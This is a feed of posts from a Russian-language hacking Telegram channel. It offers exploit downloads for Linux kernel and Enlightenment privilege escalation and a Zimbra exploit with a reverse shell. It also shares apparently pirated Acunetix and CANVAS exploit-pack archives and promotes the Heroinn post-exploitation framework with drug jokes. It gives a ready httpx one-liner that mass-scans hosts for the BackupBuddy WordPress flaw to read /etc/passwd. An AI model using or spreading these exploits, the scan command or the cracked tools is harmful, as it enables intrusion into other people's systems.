CVE-2022-2586
Помните дырку в кросс-таблице nf_tables в функции net/netfilter/nf_tables_api.c ядра Linux ?*
Так вот, ребята из OpenWall (конкретно Alejandro Guerrero), написал небольшой writeup по этой дырке, ну и в догонку написал сплоит, который очень даже можно применить.
*
Читать описание
Скачать exploit
#linux #exploit #lpe
👍5
ПроПатчиться не забыли ?
зарелизили Debian 11.5 со страшным 5.10.140-1
Ядро новое, руткиты старые 😜
#debian #patchDay
зарелизили Debian 11.5 со страшным 5.10.140-1
Ядро новое, руткиты старые 😜
#debian #patchDay
Forwarded from Proxy Bar (private)
Acunetix_14.9.220830118_linux_version.7z
250.3 MB
Linux version (august 2022)
Acunetix_14.9.220830118_windows_version.7z
197.8 MB
Windows Version (august 2022)
👍1
CANVAS_7.27+D2ExploitationPack_v2.55+WhitePhosphorus_1.28.7z
147 MB
Canvas exploitPack (version 7.27)
👍9
WhatWeb
Next generation web scanner
Жирнющий сканер, комбайн
Из интересного: Over 1800 plugins и столько же разработчиков 😜
Читаем, качаем, испытываем
#scanner #security
Next generation web scanner
Жирнющий сканер, комбайн
Из интересного: Over 1800 plugins и столько же разработчиков 😜
Читаем, качаем, испытываем
#scanner #security
👍15
Мы очень, очень рады, представить Вам ГЕРОИНН
Первый дозняк бесплатно !
так вот,
В общем берем инсулинку, Варим и пробуем тут
#framework
Первый дозняк бесплатно !
так вот,
Heroinn препарат кросс-платформенный и используется как post-exploitation framework
Прекурсором является RUST - который вызывает сильные привыкание (сильнее только python - запрещен в РФ)В общем берем инсулинку, Варим и пробуем тут
#framework
👍15😱6🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
ZeroDay в оконном менеджере Enlightenment
привелегии до rootпротестированно на ubuntu 22.04, в теории работает в любом дистре
Забрать готовый exploit
#exploit #linux #zeroday
👍10😱2
Wordpress vuln\CVE
plugin: BackupBuddy
*
Уже неделю активно используется для похека wordpress хостов
#wordpress #cve
plugin: BackupBuddy
*
cat hosts |httpx -noscript -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"*
Уже неделю активно используется для похека wordpress хостов
#wordpress #cve
🔥8👍5
Злой Putty, корейская морковка, работа_мечты_Amazon.iso и троян AIRDRY.V2'
Не понятно ? тогда читаем расследование от bleepingcomputer.com
Не понятно ? тогда читаем расследование от bleepingcomputer.com
👍7
CVE-2022-27925-zimbra_Revshell.zip
3.8 KB
Мы уже постили
Вот тот же сплоит, только с реализацией reverseShell (для ленивых)
😋
exploit для CVE-2022-27925 (zimbra)Вот тот же сплоит, только с реализацией reverseShell (для ленивых)
😋
🔥6
админам на заметку:
Как быстро раcпарсить RDP логи и понять как авторизовался удаленный юзер (kerberos или NTLM)
Download get-RdpLogonEvent.ps1
#windows #rdp
Как быстро раcпарсить RDP логи и понять как авторизовался удаленный юзер (kerberos или NTLM)
Download get-RdpLogonEvent.ps1
#windows #rdp
👍10